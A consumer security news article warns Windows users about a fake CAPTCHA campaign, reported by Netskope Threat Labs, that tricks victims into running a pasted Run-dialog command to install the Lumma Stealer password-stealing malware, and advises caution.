With password theft hack attacks firmly in the threat actor crosshairs, and those cybercriminals coming up with ever increasingly cunning attack methods to help them, this latest warning from security experts needs to be taken very seriously indeed by Windows users. Those CAPTCHA tests to prove you are human and not a bot are not only annoying as heck, but they can be dangerous. Here’s why you must not complete this particular CAPTCHA test if it is presented to you.
What You Need To Know About These Dangerous CAPTCHA Tests
The use of CAPTCHA tests (it stands for Completely Automated Public Turing test to tell Computers and Humans Apart, in case you wondered) by threat actors is not new; on Oct. 26, 2024, I reported on how a Russian hacking group was targeting Ukrainian victims using a malicious version of the Google reCAPTCHA “I am not a robot” dialog.
At the time, I said that technology such as Apple’s server-based automatic verification system to bypass completing CAPTCHA tests manually for iOS users, along with a propensity towards using browser extensions that also help to defeat the things, meant that fewer are seen day to day. The problem being that fewer and none are not the same thing, and when confronted with a CAPTCHA we are likely more inclined to complete it as quickly as possible and move on to wherever we were trying to get. Especially when you consider that the anti-bot mechanism itself, partly now because it isn’t seen so often, has become cloaked in even more trust than when we faced them every five minutes.
The Latest CAPTCHA Test Attack Warning
The latest warning comes from Leandro Fróes, a senior threat research engineer with the Netskope Threat Labs, and confirms a new threat campaign that is delivering the Lumma Stealer malware capable of grabbing your passwords and other sensitive data. “The campaign is global,” Fróes said, targeting victims in “Argentina, Colombia, the United States, the Philippines, and other countries around the world.” It also doesn’t care much about the industry sector being attacked, with everything from healthcare, banking, marketing, and the telecom industry in the crosshairs so far.
The key findings of the Netskope Threat Labs report were:
- The new Lumma Stealer campaign employs fake CAPTCHAs across multiple new websites, employing malvertising and multiple new evasion techniques to target Windows users worldwide.
- The infection chain itself, initiated by the fake CAPTCHA instructions, requires the victim to execute a command from their clipboard using the Windows Run command. This makes it very hard for browser-based defenses to flag as malicious.
Mitigating The Windows CAPTCHA Malware Threat
In the current campaign, the fake CAPTCHA instructs the user to open the Windows Run window by pressing Windows+R, pasting the clipboard’s content in the run window using CTRL+V, and then pressing ENTER to execute it. “This specific sequence is essential for the successful execution of the next stage,” Fróes said, “and it only works in Windows environments.” Which brings me to the most apparent mitigation: asking yourself when have you ever been asked to do something like that before when completing a CAPTCHA? Seriously, don’t be that trustworthy. Not all threats require sophisticated AI-driven attack methods, most still just use trickery to get you infected. Take your time, think about what you are being asked to do, and make a sensible decision.
